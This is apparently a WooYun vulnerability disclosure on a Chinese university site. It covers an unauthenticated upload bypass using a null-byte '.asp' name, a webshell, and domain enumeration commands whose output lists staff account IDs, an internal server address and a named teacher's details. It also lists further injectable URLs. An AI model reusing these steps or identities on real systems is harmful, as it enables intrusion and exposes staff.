当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084101

漏洞标题:南昌航空大学某站权限控制不严导致任意文件上传getshell威胁内网

相关厂商:南昌航空大学

漏洞作者: CapsLk

提交时间:2014-11-21 17:22

修复时间:2015-01-05 17:24

公开时间:2015-01-05 17:24

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-21: 细节已通知厂商并且等待厂商处理中
2014-11-21: 厂商已经确认,细节仅向厂商公开
2014-12-01: 细节向核心白帽子及相关领域专家公开
2014-12-11: 细节向普通白帽子公开
2014-12-21: 细节向实习白帽子公开
2015-01-05: 细节向公众公开

简要描述:

某分站上传页面权限控制不严,不登陆情况下可以上传任意文件

详细说明:

漏洞URL:http://zdh.nchu.edu.cn/admin/picupload.asp
直接选择一个图片木马
dat/pictures/1.asp%00 %00进行URL转码,提交就可以得到shell
虽然服务器安全性做的不错,无法提权,但是可以执行命令

C:\Windows\SysWOW64\inetsrv\> net group "domain admins" /domain
这项请求将在域 nchu.edu.cn 的域控制器处理。
组名 Domain Admins
注释 指定的域管理员
成员
----------------------------------------------------------------------------
---
admin Administrator
命令成功完成。
域控制器
服务器: dc1.nchu.edu.cn
Address: 10.1.89.99
部分域用户
C:\Windows\SysWOW64\inetsrv\> net user /domain
\\DC1.nchu.edu.cn
------------------------------------------------------------------------------
00005 00006 00009
00012 00013 00014
00015 00019 00020
00022 00024 00025
00029 0003 00030
00031 00032 00033
00034 00035 00036
00038 00041 0006
0007 0008 0009
0013 0021 0022
0034 0037 0043
0046 0047 0048
0049 0050 0051
0052 0068 0069
0070 0071 0076
0078 0080 0084
0086 0088 0090
0093 0094 0097
01005 01006 0104
0108 0111 0113
0115 0116 0117
0118 0120 0121
0127 0138 0139
0157 0161 0164
0166 0167 0170
0174 0183 0187
0188 0191 0196
0197 0198 0199
0200 02001 02004
02005 02006 02008
02009 0201 02010
02012 02013 02014
02017 02019 02020
02021 02022 02023
02024 02025 02026
02027 0216 03001
03005 03006 04003
04005 04007 04008
04010 04011 05001
05003 05004 05005
05006 05007 06002
06003 06004 06005
06006 06007 06009
06011 06012 06013
06014 06015 06017
06018 06019 06020
06021 07001 07002
07008 07009 07010
07011 08001 08006
08007 08008 08010
08011 08014 08017
08021 08023 08025
08026 08027 08028
08029 08030 08031
08032 08033 09003
09004 09006 09007
09008 09011 10001
10005 10006 10007
10009 10010 10011
10014 10016 10019
10022 10023 106049
109060 11001 11002
11004 113029 12004
12005 12006 12007
12009 12010 12011
1234 13002 13004
13007 14003 14006
14007 14008 14009
14010 14011 14012
14013 14014 14015
14016 14017 14018
14020 14021 14023
14026 14029 14030
14031 14032 14033
14035 14038 14040
14041 14043 14044
14045 14047 14048
14049 14050 14051
14052 14053 14054
14055 14056 14059
14060 14063 14064
14065 15001 15006
15007 15008 15009
15013 15014 15015
15016 16002 16004
16005 16007 16010
16013 16014 16015
17002 17003 17004
17007 18001 18003
18004 18005 18008
18009 18010 18012
18014 18016 18017
18019 18020 18021
18023 18024 18028
18029 18030 18034
18035 18036 18039
18040 18041 18042
19001 19003 19004
19007 19008 19009
19010 19011 19012
19014 19018 19019
19020 19022 19026
19028 19030 19032
19034 19035 19037
19038 19039 19040
19043 19044 19045
19046 192216 20001
20002 20003 20004
20005 20006 20007
20008 20009 20011
20013 20014 20018
20019 20020 21003
21005 21006 21009
21011 21013 21014
21016 21017 21018
21019 21021 21024
21025 21026 21030
21031 21033 21034
22004 22005 22006
22008 22011 22013
22014 22016 22017
22018 22020 22021
22023 22024 23001
23002 23003 23004
23007 23008 23009
23011 23012 23017
23019 23021 23022
23028 23030 24007
24009 24010 24011
24013 24022 24023
24024 24027 24028
24029 24033 24034
24035 24036 24040
24042 24044 24045
24046 24051 24056
24057 24058 24059
24060 24065 24066
24067 24069 25005
25009 25010 25012
25013 25014 25015
25016 25017 26004
26006 26009 26012
27001 27005 27008
27009 27010 27014
27018 27020 27021
27024 28006 28009
28010 28014 28015
28022 29001 29003
29005 29007 29010
29011 29015 29021
30002 30010 30012
30013 30019 31001
31002 31005 31009
31011 31016 31019
31020 32001 32004
32005 32006 32007
32008 32009 32010
32013 32014 32015
33003 33006 33007
33008 33011 33014
33015 33016 33019
33020 33022 33028
34003 34005 34007
34008 34014 34016
35002 35003 35004
35005 35008 35009
35011 35012 35015
35016 35019 36002
36004 36006 36007
36010 36015 36017
36018 36020 36021
36022 36023 36026
36028 36030 36031
36034 36038 36040
36041 36042 36045
36046 36047 36050
37008 38004 38007
38008 38011 38014
38015 39002 39003
39005 39006 39008
39009 39010 39013
39015 39017 39018
39023 39024 39025
40004 40005 40007
40009 40012 40013
40014 40016 40018
40019 40026 40027
40030 40033 41003
41004 41005 41006
41008 41014 41016
41018 41021 41022
42001 42002 42003
42004 42005 42006
42009 42010 42011
42012 42013 42015
42018 42019 42023
42025 42026 42028
42030 43001 43003
43004 43006 43007
43010 43011 43013
44001 44002 44004
44006 44007 44009
44010 44011 44013
44014 44017 44018
44019 44022 44023
44024 44027 44028
44029 45004 45006
45007 45008 45009
45010 45011 45012
45013 45015 45016
45018 45019 45020
45021 45022 45023
45024 45026 45027
45028 45033 45034
45037 45038 45039
45040 45041 45042
45043 45045 45046
45047 45048 45049
45053 45054 46002
46003 46004 46008
46009 46010 46012
46013 46014 46016
46020 46021 46023
46024 46025 46028
46029 46031 46032
46034 46035 46036
46037 46038 46041
46043 46044 46048
46049 46051 46055
46057 46059 46061
46062 46065 46066
46067 46068 46069
46070 46071 46074
46075 46077 46080
46082 46083 47001
47002 47003 47004
47005 47007 47008
47010 47011 47012
47013 47014 47015
47016 47017 47018
47019 47020 47021
47022 47023 47024
47025 47026 47027
47028 47029 47030
47031 47033 47034
47035 47036 47037
47038 47039 47041
47042 47043 47044
47045 47046 47048
47050 47051 47053
47054 47056 47057
47058 47059 47061
47062 47063 47065
47066 47067 47068
47069 47070 48006
48007 48009 48010
48012 48013 48015
48016 48019 48022
48023 48024 48027
48031 48033 48034
48035 48036 48038
48040 49001 49002
49003 49006 49007
49010 49012 49016
49018 49019 49021
49024 49025 49026
49028 49029 49030
49031 49032 49035
50006 50012 50014
50019 50021 50023
50024 50025 50026
50027 50028 50030
50031 50033 50034
50035 51001 51002
51009 51011 51015
51016 51017 51018
51019 51020 51021
51022 51023 51024
51026 51027 51029
51030 51031 51032
51033 51034 51035
51036 51037 51038
51039 51041 51042
51043 51044 51045
51046 51047 51049
51050 51051 51052
51053 51054 51055
51056 52001 52002
52006 52007 52008
52009 52010 52011
53001 53002 53004
53006 53007 53009
54002 54003 54004
54005 54007 54009
54010 54011 55001
55002 55003 55004
55005 55007 55008
55009 56001 56002
56003 56004 56006
56008 56009 56010
56011 56013 56015
56017 56018 56020
56027 56029 56030
57001 57007 57008
58001 58006 58007
58008 58010 58011
58012 58013 58014
58015 58021 58024
58027 58028 58030
58031 58038 58039
58041 58042 58044
58045 58046 58047
58049 58052 58053
58055 58056 58057
58058 58059 58061
58062 58063 58064
58065 58066 58067
58069 58070 58071
58075 58078 58079
58080 58082 58085
58086 58088 58091
58092 58093 58095
58096 58097 58098
58099 58100 58101
58102 58103 58104
58105 58107 58111
58114 58117 58118
58119 58120 58123
58124 58125 59084
59085 59086 59087
59089 59090 60008
60010 60012 60013
60014 60015 60016
60019 61002 61003
64001 64003 64004
64006 64007 64008
64013 64016 64017
64018 64019 64020
64021 64022 64024
64025 64026 64028
64029 64030 64031
64032 67002 69001
69003 69004 69005
69006 69007 69008
69009 69010 69012
69014 69015 69016
70002 70003 70005
70006 70009 70013
70014 70016 70017
70021 70022 70023
70025 70026 70027
70029 70030 70033
70034 70035 70036
70037 70039 70042
70044 70047 70049
70051 70052 70053
70058 70059 70061
70062 70064 70067
70070 70071 70072
70075 70076 70077
70078 70079 70080
70081 70082 70085
70086 70088 70089
70093 70094 70097
70099 70100 70108
70110 70112 70114
70115 70119 70120
70122 70125 70127
70128 70129 70130
70131 70133 70135
70136 70137 70138
70142 70143 70144
70145 70146 70147
70149 70151 70152
70153 70157 70161
70162 70163 70165
70166 70168 70169
70171 70174 70175
70183 70184 70185
70187 70190 70192
70193 70195 70197
70201 70202 70204
70207 70210 70212
70213 70214 70219
70220 70222 70224
70225 70230 70231
70232 70235 70236
70237 70238 70239
70241 70243 70244
70245 70248 70250
70252 70253 70254
70255 70258 70263
70265 70268 70269
70270 70272 70273
70274 70275 70276
70277 70278 70279
70280 70281 70282
70283 70284 70285
70286 70287 70288
70289 70290 70294
70296 70297 70298
70303 70306 70308
70310 70313 70316
70317 70319 70321
70324 70327 70328
70329 70331 70332
70336 70344 70345
70346 70352 70353
70354 70355 70359
70360 70361 70362
70363 70364 70365
70366 70367 70368
70369 70370 70371
70373 70375 70376
70379 70380 70381
70383 70386 70391
70392 70394 70398
70399 70400 70403
70405 70406 70407
70408 70410 70413
70417 70425 70427
70433 70434 70435
70437 70444 70447
70448 70450 70451
70452 70453 70454
70455 70457 70460
70461 70462 70464
70466 70467 70468
70469 70470 70471
70475 70480 70481
70482 70484 70485
70493 70494 70495
70496 70497 70498
70499 70500 70501
70502 70503 70504
70505 70506 70510
70511 70512 70513
70514 70516 70520
70523 70526 70527
70528 70529 70530
70531 70534 70535
70536 70537 70538
70539 70540 70541
70545 70546 70549
70551 70552 70560
70561 70562 70563
70566 70568 70570
70571 70573 70574
70575 70576 70579
70580 70581 70582
70583 70584 70586
70587 70590 70591
70592 70593 70594
70596 70598 70599
70602 70603 70604
70605 70606 70607
70611 70612 70615
70617 70620 70621
70622 70623 70624
70625 70627 70628
70629 70630 70631
72001 891101 891104
891105 891107 891108
891109 891110 891112
891113 891201 891202


通过google信息搜索,可以得知这些数字就是你校老师的工号
C:\Windows\SysWOW64\inetsrv\> net user 70623 /domain
这项请求将在域 nchu.edu.cn 的域控制器处理。
用户名 70623
全名 郭晓春
注释
用户的注释
国家/地区代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2014/10/8 15:59:56
密码到期 从不
密码可更改 2014/10/8 15:59:56
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 2014/11/19 11:15:38
可允许的登录小时数 All
本地组成员
全局组成员 *Domain Users
命令成功完成。
可以通过暴力破解,或者其他社工信息 拨入VPN,邮箱等应用,甚至威胁整个域。
http://mj.nchu.edu.cn/mjNewsInfo.asp?id=101 sql注入
http://mj.nchu.edu.cn/upfilea.asp 任意文件上传
http://wenfa.nchu.edu.cn/ 遍历目录
http://wenfa.nchu.edu.cn/md.aspx?t=0&c=f5 延时盲注 就不一一提交了,直接发上来了
本来还有更多,没保存,电脑更新补丁重启了。。

漏洞证明:

http://zdh.nchu.edu.cn/dat/pictures/1.asp
从数据库中获得一个老师帐号

mask 区域
*****675*****


该帐号可以进一步登陆其他网站后台,并且可以通过搜索可以得到该老师管理的一些网站,同理数据库中还有别的老师的帐号密码,可以控制更多的帐号密码,通过上面得到的域信息,可以组合密码.

3.png


233.png

修复方案:

把这台服务器直接放在DMZ,那么这些小网站的漏洞也无伤大雅,其他分站漏洞也很多,移动到DMZ可以简单省事,建议在服务器上安装安全软件,很多分站都有被入侵的痕迹,可以严查

版权声明:转载请注明来源 CapsLk@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2014-11-21 18:08

厂商回复:

谢谢提醒,由于目前各单位的技术实力有限,网站漏洞层出不穷。学校正在通过网站群的方式来统计建立和管理。由于这台服务器加了域,因此可以读取域的信息,现在已经退域处理了。感谢你的反馈。

最新状态:

暂无